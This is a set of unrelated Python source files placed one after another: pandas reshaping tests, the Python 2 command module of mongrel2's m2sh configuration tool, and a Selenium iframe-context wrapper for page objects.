'cat_y': [0, 1, 1]})
cols = ['A_b', 'B_c', 'cat_y']
expected[cols] = expected[cols].astype(np.uint8)
expected = expected[['C', 'A_b', 'B_c', 'cat_y']]
assert_frame_equal(result, expected)
def test_dataframe_dummies_drop_first_with_na(self):
df = self.df
df.loc[3, :] = [np.nan, np.nan, np.nan]
result = get_dummies(df, dummy_na=True, sparse=self.sparse,
drop_first=True)
expected = DataFrame({'C': [1, 2, 3, np.nan],
'A_b': [0, 1, 0, 0],
'A_nan': [0, 0, 0, 1],
'B_c': [0, 0, 1, 0],
'B_nan': [0, 0, 0, 1]})
cols = ['A_b', 'A_nan', 'B_c', 'B_nan']
expected[cols] = expected[cols].astype(np.uint8)
expected = expected[['C', 'A_b', 'A_nan', 'B_c', 'B_nan']]
assert_frame_equal(result, expected)
result = get_dummies(df, dummy_na=False, sparse=self.sparse,
drop_first=True)
expected = expected[['C', 'A_b', 'B_c']]
assert_frame_equal(result, expected)
def test_int_int(self):
data = Series([1, 2, 1])
result = pd.get_dummies(data)
expected = DataFrame([[1, 0], [0, 1], [1, 0]], columns=[1, 2],
dtype=np.uint8)
tm.assert_frame_equal(result, expected)
data = Series(pd.Categorical(['a', 'b', 'a']))
result = pd.get_dummies(data)
expected = DataFrame([[1, 0], [0, 1], [1, 0]],
columns=pd.Categorical(['a', 'b']),
dtype=np.uint8)
tm.assert_frame_equal(result, expected)
def test_int_df(self):
data = DataFrame(
{'A': [1, 2, 1],
'B': pd.Categorical(['a', 'b', 'a']),
'C': [1, 2, 1],
'D': [1., 2., 1.]
}
)
columns = ['C', 'D', 'A_1', 'A_2', 'B_a', 'B_b']
expected = DataFrame([
[1, 1., 1, 0, 1, 0],
[2, 2., 0, 1, 0, 1],
[1, 1., 1, 0, 1, 0]
], columns=columns)
expected[columns[2:]] = expected[columns[2:]].astype(np.uint8)
result = pd.get_dummies(data, columns=['A', 'B'])
tm.assert_frame_equal(result, expected)
def test_dataframe_dummies_preserve_categorical_dtype(self):
# GH13854
for ordered in [False, True]:
cat = pd.Categorical(list("xy"), categories=list("xyz"),
ordered=ordered)
result = get_dummies(cat)
data = np.array([[1, 0, 0], [0, 1, 0]], dtype=np.uint8)
cols = pd.CategoricalIndex(cat.categories,
categories=cat.categories,
ordered=ordered)
expected = DataFrame(data, columns=cols)
tm.assert_frame_equal(result, expected)
class TestGetDummiesSparse(TestGetDummies):
sparse = True
class TestMakeAxisDummies(object):
def test_preserve_categorical_dtype(self):
# GH13854
for ordered in [False, True]:
cidx = pd.CategoricalIndex(list("xyz"), ordered=ordered)
midx = pd.MultiIndex(levels=[['a'], cidx],
labels=[[0, 0], [0, 1]])
df = DataFrame([[10, 11]], index=midx)
expected = DataFrame([[1.0, 0.0, 0.0], [0.0, 1.0, 0.0]],
index=midx, columns=cidx)
from pandas.core.reshape.reshape import make_axis_dummies
result = make_axis_dummies(df)
tm.assert_frame_equal(result, expected)
result = make_axis_dummies(df, transform=lambda x: x)
tm.assert_frame_equal(result, expected)
class TestLreshape(object):
def test_pairs(self):
data = {'birthdt': ['08jan2009', '20dec2008', '30dec2008', '21dec2008',
'11jan2009'],
'birthwt': [1766, 3301, 1454, 3139, 4133],
'id': [101, 102, 103, 104, 105],
'sex': ['Male', 'Female', 'Female', 'Female', 'Female'],
'visitdt1': ['11jan2009', '22dec2008', '04jan2009',
'29dec2008', '20jan2009'],
'visitdt2':
['21jan2009', nan, '22jan2009', '31dec2008', '03feb2009'],
'visitdt3': ['05feb2009', nan, nan, '02jan2009', '15feb2009'],
'wt1': [1823, 3338, 1549, 3298, 4306],
'wt2': [2011.0, nan, 1892.0, 3338.0, 4575.0],
'wt3': [2293.0, nan, nan, 3377.0, 4805.0]}
df = DataFrame(data)
spec = {'visitdt': ['visitdt%d' % i for i in range(1, 4)],
'wt': ['wt%d' % i for i in range(1, 4)]}
result = lreshape(df, spec)
exp_data = {'birthdt':
['08jan2009', '20dec2008', '30dec2008', '21dec2008',
'11jan2009', '08jan2009', '30dec2008', '21dec2008',
'11jan2009', '08jan2009', '21dec2008', '11jan2009'],
'birthwt': [1766, 3301, 1454, 3139, 4133, 1766, 1454, 3139,
4133, 1766, 3139, 4133],
'id': [101, 102, 103, 104, 105, 101, 103, 104, 105, 101,
104, 105],
'sex': ['Male', 'Female', 'Female', 'Female', 'Female',
'Male', 'Female', 'Female', 'Female', 'Male',
'Female', 'Female'],
'visitdt': ['11jan2009', '22dec2008', '04jan2009',
'29dec2008', '20jan2009', '21jan2009',
'22jan2009', '31dec2008', '03feb2009',
'05feb2009', '02jan2009', '15feb2009'],
'wt': [1823.0, 3338.0, 1549.0, 3298.0, 4306.0, 2011.0,
1892.0, 3338.0, 4575.0, 2293.0, 3377.0, 4805.0]}
exp = DataFrame(exp_data, columns=result.columns)
tm.assert_frame_equal(result, exp)
result = lreshape(df, spec, dropna=False)
exp_data = {'birthdt':
['08jan2009', '20dec2008', '30dec2008', '21dec2008',
'11jan2009', '08jan2009', '20dec2008', '30dec2008',
'21dec2008', '11jan2009', '08jan2009', '20dec2008',
'30dec2008', '21dec2008', '11jan2009'],
'birthwt': [1766, 3301, 1454, 3139, 4133, 1766, 3301, 1454,
3139, 4133, 1766, 3301, 1454, 3139, 4133],
'id': [101, 102, 103, 104, 105, 101, 102, 103, 104, 105,
101, 102, 103, 104, 105],
'sex': ['Male', 'Female', 'Female', 'Female', 'Female',
'Male', 'Female', 'Female', 'Female', 'Female',
'Male', 'Female', 'Female', 'Female', 'Female'],
'visitdt': ['11jan2009', '22dec2008', '04jan2009',
'29dec2008', '20jan2009', '21jan2009', nan,
'22jan2009', '31dec2008', '03feb2009',
'05feb2009', nan, nan, '02jan2009',
'15feb2009'],
'wt': [1823.0, 3338.0, 1549.0, 3298.0, 4306.0, 2011.0, nan,
1892.0, 3338.0, 4575.0, 2293.0, nan, nan, 3377.0,
4805.0]}
exp = DataFrame(exp_data, columns=result.columns)
tm.assert_frame_equal(result, exp)
spec = {'visitdt': ['visitdt%d' % i for i in range(1, 3)],
'wt': ['wt%d' % i for i in range(1, 4)]}
pytest.raises(ValueError, lreshape, df, spec)
class TestWideToLong(object):
def test_simple(self):
np.random.seed(123)
x = np.random.randn(3)
df = pd.DataFrame({"A1970": {0: "a",
1: "b",
2: "c"},
"A1980": {0: "d",
1: "e",
2: "f"},
"B1970": {0: 2.5,
1: 1.2,
2: .7},
"B1980": {0: 3.2,
1: 1.3,
2: .1},
"X": dict(zip(
range(3), x))})
df["id"] = df.index
exp_data = {"X": x.tolist() + x.tolist(),
"A": ['a', 'b', 'c', 'd', 'e', 'f'],
"B": [2.5, 1.2, 0.7, 3.2, 1.3, 0.1],
"year": ['1970', '1970', '1970', '1980', '1980', '1980'],
"id": [0, 1, 2, 0, 1, 2]}
exp_frame = DataFrame(exp_data)
exp_frame = exp_frame.set_index(['id', 'year'])[["X", "A", "B"]]
long_frame = wide_to_long(df, ["A", "B"], i="id", j="year")
tm.assert_frame_equal(long_frame, exp_frame)
def test_stubs(self):
# GH9204
df = pd.DataFrame([[0, 1, 2, 3, 8], [4, 5, 6, 7, 9]])
df.columns = ['id', 'inc1', 'inc2', 'edu1', 'edu2']
stubs = ['inc', 'edu']
# TODO: unused?
df_long = pd.wide_to_long(df, stubs, i='id', j='age') # noqa
assert stubs == ['inc', 'edu']
def test_separating_character(self):
# GH14779
np.random.seed(123)
x = np.random.randn(3)
df = pd.DataFrame({"A.1970": {0: "a",
1: "b",
2: "c"},
"A.1980": {0: "d",
1: "e",
2: "f"},
"B.1970": {0: 2.5,
1: 1.2,
2: .7},
"B.1980": {0: 3.2,
1: 1.3,
2: .1},
"X": dict(zip(
range(3), x))})
df["id"] = df.index
exp_data = {"X": x.tolist() + x.tolist(),
"A": ['a', 'b', 'c', 'd', 'e', 'f'],
"B": [2.5, 1.2, 0.7, 3.2, 1.3, 0.1],
"year": ['1970', '1970', '1970', '1980', '1980', '1980'],
"id": [0, 1, 2, 0, 1, 2]}
exp_frame = DataFrame(exp_data)
exp_frame = exp_frame.set_index(['id', 'year'])[["X", "A", "B"]]
long_frame = wide_to_long(df, ["A", "B"], i="id", j="year", sep=".")
tm.assert_frame_equal(long_frame, exp_frame)
def test_escapable_characters(self):
np.random.seed(123)
x = np.random.randn(3)
df = pd.DataFrame({"A(quarterly)1970": {0: "a",
1: "b",
2: "c"},
"A(quarterly)1980": {0: "d",
1: "e",
2: "f"},
"B(quarterly)1970": {0: 2.5,
1: 1.2,
2: .7},
"B(quarterly)1980": {0: 3.2,
1: 1.3,
2: .1},
"X": dict(zip(
range(3), x))})
df["id"] = df.index
exp_data = {"X": x.tolist() + x.tolist(),
"A(quarterly)": ['a', 'b', 'c', 'd', 'e', 'f'],
"B(quarterly)": [2.5, 1.2, 0.7, 3.2, 1.3, 0.1],
"year": ['1970', '1970', '1970', '1980', '1980', '1980'],
"id": [0, 1, 2, 0, 1, 2]}
exp_frame = DataFrame(exp_data)
exp_frame = exp_frame.set_index(
['id', 'year'])[["X", "A(quarterly)", "B(quarterly)"]]
long_frame = wide_to_long(df, ["A(quarterly)", "B(quarterly)"],
i="id", j="year")
tm.assert_frame_equal(long_frame, exp_frame)
def test_unbalanced(self):
# test that we can have a varying amount of time variables
df = pd.DataFrame({'A2010': [1.0, 2.0],
'A2011': [3.0, 4.0],
'B2010': [5.0, 6.0],
'X': ['X1', 'X2']})
df['id'] = df.index
exp_data = {'X': ['X1', 'X1', 'X2', 'X2'],
'A': [1.0, 3.0, 2.0, 4.0],
'B': [5.0, np.nan, 6.0, np.nan],
'id': [0, 0, 1, 1],
'year': ['2010', '2011', '2010', '2011']}
exp_frame = pd.DataFrame(exp_data)
exp_frame = exp_frame.set_index(['id', 'year'])[["X", "A", "B"]]
long_frame = wide_to_long(df, ['A', 'B'], i='id', j='year')
tm.assert_frame_equal(long_frame, exp_frame)
def test_character_overlap(self):
# Test we handle overlapping characters in both id_vars and value_vars
df = pd.DataFrame({
'A11': ['a11', 'a22', 'a33'],
'A12': ['a21', 'a22', 'a23'],
'B11': ['b11', 'b12', 'b13'],
'B12': ['b21', 'b22', 'b23'],
'BB11': [1, 2, 3],
'BB12': [4, 5, 6],
'BBBX': [91, 92, 93],
'BBBZ': [91, 92, 93]
})
df['id'] = df.index
exp_frame = pd.DataFrame({
'BBBX': [91, 92, 93, 91, 92, 93],
'BBBZ': [91, 92, 93, 91, 92, 93],
'A': ['a11', 'a22', 'a33', 'a21', 'a22', 'a23'],
'B': ['b11', 'b12', 'b13', 'b21', 'b22', 'b23'],
'BB': [1, 2, 3, 4, 5, 6],
'id': [0, 1, 2, 0, 1, 2],
'year': ['11', '11', '11', '12', '12', '12']})
exp_frame = exp_frame.set_index(['id', 'year'])[
['BBBX', 'BBBZ', 'A', 'B', 'BB']]
long_frame = wide_to_long(df, ['A', 'B', 'BB'], i='id', j='year')
tm.assert_frame_equal(long_frame.sort_index(axis=1),
exp_frame.sort_index(axis=1))
def test_invalid_separator(self):
# if an invalid separator is supplied a empty data frame is returned
sep = 'nope!'
df = pd.DataFrame({'A2010': [1.0, 2.0],
'A2011': [3.0, 4.0],
'B2010': [5.0, 6.0],
'X': ['X1', 'X2']})
df['id'] = df.index
exp_data = {'X': '',
'A2010': [],
'A2011': [],
'B2010': [],
'id': [],
'year': [],
'A': [],
'B': []}
exp_frame = pd.DataFrame(exp_data)
exp_frame = exp_frame.set_index(['id', 'year'])[[
'X', 'A2010', 'A2011', 'B2010', 'A', 'B']]
exp_frame.index.set_levels([[0, 1], []], inplace=True)
long_frame = wide_to_long(df, ['A', 'B'], i='id', j='year', sep=sep)
tm.assert_frame_equal(long_frame.sort_index(axis=1),
exp_frame.sort_index(axis=1))
def test_num_string_disambiguation(self):
# Test that we can disambiguate number value_vars from
# string value_vars
df = pd.DataFrame({
'A11': ['a11', 'a22', 'a33'],
'A12': ['a21', 'a22', 'a23'],
'B11': ['b11', 'b12', 'b13'],
'B12': ['b21', 'b22', 'b23'],
'BB11': [1, 2, 3],
'BB12': [4, 5, 6],
'Arating': [91, 92, 93],
'Arating_old': [91, 92, 93]
})
df['id'] = df.index
exp_frame = pd.DataFrame({
'Arating': [91, 92, 93, 91, 92, 93],
'Arating_old': [91, 92, 93, 91, 92, 93],
'A': ['a11', 'a22', 'a33', 'a21', 'a22', 'a23'],
'B': ['b11', 'b12', 'b13', 'b21', 'b22', 'b23'],
'BB': [1, 2, 3, 4, 5, 6],
'id': [0, 1, 2, 0, 1, 2],
'year': ['11', '11', '11', '12', '12', '12']})
exp_frame = exp_frame.set_index(['id', 'year'])[
['Arating', 'Arating_old', 'A', 'B', 'BB']]
long_frame = wide_to_long(df, ['A', 'B', 'BB'], i='id', j='year')
tm.assert_frame_equal(long_frame.sort_index(axis=1),
exp_frame.sort_index(axis=1))
def test_invalid_suffixtype(self):
# If all stubs names end with a string, but a numeric suffix is
# assumed, an empty data frame is returned
df = pd.DataFrame({'Aone': [1.0, 2.0],
'Atwo': [3.0, 4.0],
'Bone': [5.0, 6.0],
'X': ['X1', 'X2']})
df['id'] = df.index
exp_data = {'X': '',
'Aone': [],
'Atwo': [],
'Bone': [],
'id': [],
'year': [],
'A': [],
'B': []}
exp_frame = pd.DataFrame(exp_data)
exp_frame = exp_frame.set_index(['id', 'year'])[[
'X', 'Aone', 'Atwo', 'Bone', 'A', 'B']]
exp_frame.index.set_levels([[0, 1], []], inplace=True)
long_frame = wide_to_long(df, ['A', 'B'], i='id', j='year')
tm.assert_frame_equal(long_frame.sort_index(axis=1),
exp_frame.sort_index(axis=1))
def test_multiple_id_columns(self):
# Taken from http://www.ats.ucla.edu/stat/stata/modules/reshapel.htm
df = pd.DataFrame({
'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3],
'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3],
'ht1': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1],
'ht2': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9]
})
exp_frame = pd.DataFrame({
'ht': [2.8, 3.4, 2.9, 3.8, 2.2, 2.9, 2.0, 3.2, 1.8,
2.8, 1.9, 2.4, 2.2, 3.3, 2.3, 3.4, 2.1, 2.9],
'famid': [1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 3, 3, 3, 3, 3, 3],
'birth': [1, 1, 2, 2, 3, 3, 1, 1, 2, 2, 3, 3, 1, 1, 2, 2, 3, 3],
'age': ['1', '2', '1', '2', '1', '2', '1', '2', '1',
'2', '1', '2', '1', '2', '1', '2', '1', '2']
})
exp_frame = exp_frame.set_index(['famid', 'birth', 'age'])[['ht']]
long_frame = wide_to_long(df, 'ht', i=['famid', 'birth'], j='age')
tm.assert_frame_equal(long_frame, exp_frame)
def test_non_unique_idvars(self):
# GH16382
# Raise an error message if non unique id vars (i) are passed
df = pd.DataFrame({
'A_A1': [1, 2, 3, 4, 5],
'B_B1': [1, 2, 3, 4, 5],
'x': [1, 1, 1, 1, 1]
})
with pytest.raises(ValueError):
wide_to_long(df, ['A_A', 'B_B'], i='x', j='colname')
| |
from mongrel2 import config
from mongrel2.config import args
import mongrel2.config.commands
from uuid import uuid4
from mongrel2.config import model
import getpass
import sys
import os
import signal
from sqlite3 import OperationalError
def try_reading(reader):
try:
cmd = reader.readline()
return cmd.split(' ')
except UnicodeDecodeError:
print "\nERROR: Sorry, PyRepl and Python hate printing to your screen: UnicodeDecodeError."
return []
def shell_command():
"""
Starts an interactive shell with readline style input so you can
work with Mongrel2 easier.
"""
try:
from pyrepl.unix_console import UnixConsole
from pyrepl.historical_reader import HistoricalReader
except:
print "You don't have PyRepl installed, shell not available."
reader = HistoricalReader(UnixConsole())
reader.ps1 = "m2> "
reader.ps2 = "..> "
reader.ps3 = "...> "
reader.ps4 = "....> "
try:
while True:
cmd = try_reading(reader)
if cmd:
try:
args.parse_and_run_command(cmd, mongrel2.config.commands)
except Exception, e:
print "ERROR:", e
except EOFError:
print "Bye."
except KeyboardInterrupt:
print "BYE!"
def help_command(**options):
"""
Prints out help for the commands.
m2sh help
You can get help for one command with:
m2sh help -for STR
"""
if "for" in options:
help_text = args.help_for_command(config.commands, options['for'])
if help_text:
print help_text
else:
args.invalid_command_message(config.commands)
else:
print "Available commands:\n"
print "\n".join(args.available_commands(config.commands))
print "\nUse config help -for <command> to find out more."
def dump_command(db=None):
"""
Simple dump of a config database:
m2sh dump -db config.sqlite
"""
print "LOADING DB: ", db
try:
if not (os.path.isfile(db) and os.access(db, os.R_OK)):
raise IOError
store = model.begin(db)
servers = store.find(model.Server)
for server in servers:
print server
for host in server.hosts:
print "\t", host
for route in host.routes:
print "\t\t", route
except IOError:
print "%s not readable" % db
except OperationalError, exc:
print "SQLite error: %s" % exc
def uuid_command(hex=False):
"""
Generates a UUID for you to use in your configurations:
m2sh uuid
m2sh uuid -hex
The -hex means to print it as a big hex number, which is
more efficient but harder to read.
"""
if hex:
print uuid4().hex
else:
print str(uuid4())
def servers_command(db=None):
"""
Lists the servers that are configured in this setup:
m2sh servers -db config.sqlite
"""
if not os.path.isfile(db):
print "ERROR: Cannot access database file %s" % db
return
try:
store = model.begin(db)
servers = store.find(model.Server)
for server in servers:
print "-------"
print server.name, server.default_host, server.uuid
for host in server.hosts:
print "\t", host.id, ':', host.name
except OperationalError, exc:
print "SQLite error: %s" % exc
def hosts_command(db=None, uuid="", host="", name=""):
"""
List all the hosts in the given server identified by UUID or host.
m2sh hosts -db config.sqlite -uuid f400bf85-4538-4f7a-8908-67e313d515c2
m2sh hosts -db config.sqlite -host localhost
m2sh hosts -db config.sqlite -name test
The -host parameter is the default_host for the server.
"""
if not (os.path.isfile(db) and os.access(db, os.R_OK)):
print "Cannot read database file %s" % db
return
try:
store = model.begin(db)
results = None
if uuid:
results = store.find(model.Server, model.Server.uuid == unicode(uuid))
elif host:
results = store.find(model.Server, model.Server.default_host == unicode(host))
elif name:
results = store.find(model.Server, model.Server.name == unicode(name))
else:
print "ERROR: Must give a -host or -uuid or -name."
return
if results.count():
server = results[0]
hosts = store.find(model.Host, model.Host.server_id == server.id)
for host in hosts:
print "--------"
print host, ":"
for route in host.routes:
print "\t", route.path, ':', route.target
else:
print "No servers found."
except OperationalError, exc:
print "SQLite error: %s" % exc
def init_command(db=None):
"""
Initializes a new config database.
m2sh init -db config.sqlite
It will obliterate this config.
"""
from pkg_resources import resource_stream
import sqlite3
sql = resource_stream('mongrel2', 'sql/config.sql').read()
if model.store:
model.store.close()
model.store = None
if os.path.isfile(db) and not os.access(db, os.W_OK):
print "Cannot access database file %s" % db
return
try:
conn = sqlite3.connect(db)
conn.executescript(sql)
commit_command(db=db, what="init_command", why=" ".join(sys.argv))
except OperationalError, exc:
print "Error: %s" % exc
def load_command(db=None, config=None, clear=True):
"""
After using init you can use this to load a config:
m2sh load -db config.sqlite -config tests/sample_conf.py
This will erase the previous config, but we'll make it
safer later on.
"""
import imp
if not (os.path.isfile(db) and os.access(db, os.R_OK)):
print "Cannot access database file %s" % db
return
try:
model.begin(db, clear=clear)
imp.load_source('mongrel2_config_main', config)
commit_command(db=db, what="load_command", why=" ".join(sys.argv))
except OperationalError, exc:
print "SQLite error: %s" % exc
except SyntaxError,exc:
print "Syntax error: %s" % exc
def config_command(db=None, config=None, clear=True):
"""
Effectively does an init then load of a config to get
you started quicker:
m2sh config -db config.sqlite -config tests/sample_conf.py
Like the other two, this will nuke your config, but we'll
make it safer later.
"""
init_command(db=db)
load_command(db=db, config=config, clear=clear)
def commit_command(db=None, what=None, why=None):
"""
Used to a commit event to the database for other admins to know
what is going on with the config. The system logs quite a lot
already for you, like your username, machine name, etc:
m2sh commit -db test.sqlite -what mongrel2.org \
-why "Needed to change paters."
In future versions it will prevent you from committing as root,
because only assholes commit from root.
Both parameters are arbitrary, but I like to record what I did to
different Hosts in servers.
"""
import socket
store = model.load_db("sqlite:" + db)
who = unicode(getpass.getuser())
if who == u'root':
print "Commit from root eh? Man, you're kind of a tool."
log = model.Log()
log.who = who
log.what = unicode(what)
log.why = unicode(why)
log.location = unicode(socket.gethostname())
log.how = u'm2sh'
store.add(log)
store.commit()
def log_command(db=None, count=20):
"""
Dumps commit logs:
m2sh log -db test.sqlite -count 20
m2sh log -db test.sqlite
So you know who to blame.
"""
store = model.load_db("sqlite:" + db)
logs = store.find(model.Log)
for log in logs.order_by(model.Log.happened_at)[0:count]:
print log
def find_servers(db=None, uuid="", host="", name="", every=False):
"""
Finds all the servers which match the given uuid, host or name.
If every is true all servers in the database will be returned.
"""
store = model.begin(db)
servers = []
if every:
servers = store.find(model.Server)
elif uuid:
servers = store.find(model.Server, model.Server.uuid == unicode(uuid))
elif host:
servers = store.find(model.Server, model.Server.default_host == unicode(host))
elif name:
servers = store.find(model.Server, model.Server.name == unicode(name))
if servers.count() > 1 and not every:
print "Not sure which server to run, what I found:"
print "NAME HOST UUID"
print "--------------"
for server in servers:
print server.name, server.default_host, server.uuid
print "* Use -every to run them all."
return []
else:
return servers
def start_command(db=None, uuid= "", host="", name="", sudo=False, every=False):
"""
Does a simple start of the given server(s) identified by the uuid, host
(default_host) parameter or the name.:
m2sh start -db config.sqlite -uuid 3d815ade-9081-4c36-94dc-77a9b060b021
m2sh start -db config.sqlite -host localhost
m2sh start -db config.sqlite -name test
m2sh start -db config.sqlite -every
Give the -sudo options if you want it to start mongrel2 as root for you
(must have sudo installed).
Give the -every option if you want mongrel2 to launch all servers listed in
the given db.
If multiple servers match and -every is not given, m2sh will ask you which
to start.
"""
root_enabler = 'sudo' if sudo else ''
servers = find_servers(db, uuid, host, name, every)
if not servers or servers.count() == 0:
print 'No matching servers found, nothing launched'
else:
for server in servers:
print 'Launching server %s %s on port %d' % (server.name, server.uuid, server.port)
os.system('%s mongrel2 %s %s' % (root_enabler, db, server.uuid))
def stop_command(db=None, uuid="", host="", name="", every=False, murder=False):
"""
Stops a running mongrel2 process according to the host, either
gracefully (INT) or murderous (TERM):
m2sh stop -db config.sqlite -host localhost
m2sh stop -db config.sqlite -host localhost -murder
m2sh stop -db config.sqlite -name test -murder
m2sh stop -db config.sqlite -every
You shouldn't need sudo to stop a running mongrel if you
are also the user that owns the chroot directory or root.
Normally mongrel2 will wait until connections die off before really
leaving, but you can give it the -murder flag and it'll nuke it
semi-gracefully. You can also do it again with -murder if it's waiting
for some dead connections and you want it to just quit.
"""
for server in find_servers(db, uuid, host, name, every):
pid = get_server_pid(server)
if pid:
sig = signal.SIGTERM if murder else signal.SIGINT
os.kill(pid, sig)
def reload_command(db=None, uuid="", host="", name="", every=False):
"""
Causes Mongrel2 to do a soft-reload which will re-read the config
database and then attempt to load a whole new configuration without
losing connections on the previous one:
m2sh reload -db config.sqlite -uuid 3d815ade-9081-4c36-94dc-77a9b060b021
m2sh reload -db config.sqlite -host localhost
m2sh reload -db config.sqlite -name test
m2sh reload -db config.sqlite -every
This reload will need access to the config database from within the
chroot for it to work, and it's not totally guaranteed to be 100%
reliable, but if you are doing development and need to do quick changes
then this is what you do.
"""
for server in find_servers(db, uuid, host, name, every):
pid = get_server_pid(server)
if pid:
os.kill(pid, signal.SIGHUP)
def running_command(db=None, uuid="", host="", name="", every=False):
"""
Tells you if the given server is still running:
m2sh running -db config.sqlite -uuid 3d815ade-9081-4c36-94dc-77a9b060b021
m2sh running -db config.sqlite -host localhost
m2sh running -db config.sqlite -name test
m2sh running -db config.sqlite -every
"""
for server in find_servers(db, uuid, host, name, every):
pid = get_server_pid(server)
# TODO: Clean this up.
if pid:
try:
os.kill(pid, 0)
print "Found server %s %s RUNNING at PID %i" % (server.name,
server.uuid,
pid)
except OSError:
print "Server %s %s NOT RUNNING at PID %i" % (server.name,
server.uuid,
pid)
def control_command(db=None, host="", name="", uuid=""):
"""
Start a simple control console for working with mongrel2.
This is *very* bare bones at the moment but should improve.
m2sh control -db config.sqlite -uuid 3d815ade-9081-4c36-94dc-77a9b060b021
m2sh control -db config.sqlite -host localhost
m2sh control -db config.sqlite -name test
"""
store = model.load_db("sqlite:" + db)
import zmq
servers = find_servers(db, uuid, host, name, False)
if servers:
server = servers[0]
CTX = zmq.Context()
results = store.find(model.Setting, model.Setting.key == unicode("control_port"))
addr = results[0].value if results.count() > 1 else "ipc://run/control"
ctl = CTX.socket(zmq.REQ)
print "CONNECTING to: %s in %s" % (addr, server.chroot)
os.chdir(server.chroot)
ctl.connect(addr)
try:
while True:
cmd = raw_input("> ")
ctl.send(cmd)
print ctl.recv()
except EOFError:
ctl.close()
def get_server_pid(server):
pid_file = os.path.realpath(server.chroot + server.pid_file)
if not os.path.isfile(pid_file):
print "PID file %s not found for server %s %s" % (pid_file,
server.name,
server.uuid)
return None
else:
return int(open(pid_file, 'r').read())
def version_command():
"""
Prints out the version of your mongrel2 binary."
"""
print "Mongrel2/1.7.5"
| |
import random
import string
# iframe_locators - all iframes that need to be traversed
# to get to this object
# iframe_locator_ids - keys into the obj's owner's locatordict for iframes
# current_framelevel - index of the current iframe in iframe_locators
class IframeTracker(object):
def __init__(self,obj):
self.obj = obj
self.iframe_locators = []
self.iframe_locator_ids = []
self.current_framelevel = 0
def add_iframe(self,framelocid):
iframeloc = self.obj.owner.locators[framelocid]
if iframeloc is not None:
self.iframe_locators.append(iframeloc)
self.iframe_locator_ids.append(framelocid)
def update_iframe_locators(self):
iframelocids = self.iframe_locator_ids
self.iframe_locators = []
self.iframe_locator_ids = []
for framelocid in iframelocids:
self.add_iframe(framelocid)
def wrap_new_object(self,obj):
objlist = [obj]
for o in objlist:
o.logger.debug('wrapping %s' % (o.__class__.__name__))
o.iframe_tracker = self
self.wrap_callable_attributes(o)
self.wrap_property_attributes(o)
objlist.extend(o.widgets)
def wrap_callable_attributes(self,o):
"""wrap callable attributes of the object.
traverse the object's class and base classes to find
callable attributes to wrap.
avoid wrapping __init__() methods and "noiframe" methods
that were predetermined not to be affected by iframes.
"""
clslist = [o.__class__]
for cls in clslist:
if cls.__name__ == 'object':
continue
dct = cls.__dict__
for attr, item in dct.items():
if attr != '__init__' and callable(item):
if attr in o.noiframe:
# skip attributes that are specifically
# noted not to need an iframe context change
# as listed in the noiframe list
self.obj.logger.debug('skipping function: %s' % (attr))
continue
item = getattr(o,attr)
setattr(o,attr,self.wrap_attribute(item))
self.obj.logger.debug('wrapping function: %s' % (attr))
clslist.extend(cls.__bases__)
def wrap_property_attributes(self,o):
"""wrap property attributes of the object.
to do this, we first create a new class object that we can
freely manipulate, by copying the base classes and attribute
dictionary from the original page object class. next we search
the new class for property attributes.
currently we only wrap the properties of the object's class.
properties of the object's base clases are ignored for now.
i believe the act of accessing the property ends up executing
the property's getter or setter methods, which will fail if
you are not on the page and in the correct context hosting
the object. Or perhaps the property information is associated
with a class object, so changing the class object changes how
all newly instantiated objects will work.
"""
randtxt = ''.join([random.choice(string.ascii_lowercase) \
for i in range(5)])
clsname = "IframeWrap_" + randtxt + "_" + o.__class__.__name__
self.obj.logger.debug('creating new class \'%s\' from \'%s\'' \
% (clsname,o.__class__.__name__))
cls = type(clsname,
o.__class__.__bases__,
dict(o.__class__.__dict__))
o.__class__ = cls
dct = cls.__dict__
for attr, item in dct.items():
if isinstance(item,property):
if attr in o.noiframe:
# skip attributes that are specifically
# noted not to need an iframe context change
# as listed in the noiframe list
self.obj.logger.debug('skipping property: %s' % (attr))
continue
new_property = property(self.wrap_attribute(item.__get__),
self.wrap_attribute(item.__set__),
item.__delattr__)
setattr(cls,attr,new_property)
self.obj.logger.debug('wrapping property: %s' % (attr))
def wrap_attribute(self,f):
def _wrapper(*args, **kwds):
self.obj.logger.debug('Entering wrapper function for %s' \
% (f.__name__))
# count our framelevels backwards
# think of framelevel 0 as the browser context
initial_framelevel = self.current_framelevel
final_framelevel = -1 * len(self.iframe_locators)
self.obj.logger.debug('starting frame level: %s' \
% (self.current_framelevel))
switched = self._switch_to_iframe_context(final_framelevel)
# make sure we return to the previous context if an exception is
# raised. exceptions are often raised when using find_element
# based functions or waiting for elements to appear or diappear.
# this try/final block helps ensure we don't lose track of our
# frame level when exceptions occur.
r = None
try:
# call the function
self.obj.logger.debug('current frame level: %s in %s' \
% (self.current_framelevel, self.iframe_locators))
self.obj.logger.debug('calling function: %s' % f.__name__)
r = f(*args, **kwds)
finally:
# exit the frame
if switched:
self._switch_to_iframe_context(initial_framelevel)
self.obj.logger.debug('ending frame level = %s' \
% (self.current_framelevel))
self.obj.logger.debug('Exiting wrapper function for %s' \
% (f.__name__))
return r
return _wrapper
def _switch_to_iframe_context(self,framelevel):
switched_frames = False
if framelevel > self.current_framelevel:
self.obj.logger.debug('-> switching to default context')
self.obj._browser.switch_to_default_content()
self.current_framelevel = 0
switched_frames = True
while self.current_framelevel > framelevel:
next_framelevel = self.current_framelevel - 1
frameloc = self.iframe_locators[next_framelevel]
# we use the obj's owner's find_element to help us deal
# with the edge case where obj is in an iframe and the owner is not
# if obj and owner are in different frames, we will first
# get into the owner's frame, then perform a search for the element
frame = self.obj.owner.find_element(frameloc)
self.obj.logger.debug('-> switching to iframe: %s' % (frameloc))
self.obj._browser.switch_to_frame(frame)
self.current_framelevel = next_framelevel
switched_frames = True
return switched_frames
def IframeWrap(obj,framelocids):
if obj.iframe_tracker is not None:
ift = obj.iframe_tracker
else:
ift = IframeTracker(obj)
# accept a string or list of frame locator ids
if not hasattr(framelocids,'__iter__'):
framelocids = [framelocids]
# add each iframe, inner most iframe first
for framelocid in framelocids:
ift.add_iframe(framelocid)
ift.wrap_new_object(obj)
return obj
# a = A()
# a = IframeWrap(a,['iframe'])
# a = IframeWrap(a,['iframe2','iframe1'])
# a = IframeWrap(IframeWrap(a,'iframe2'),'iframe1')
| |
# -*- coding: utf-8 -*-
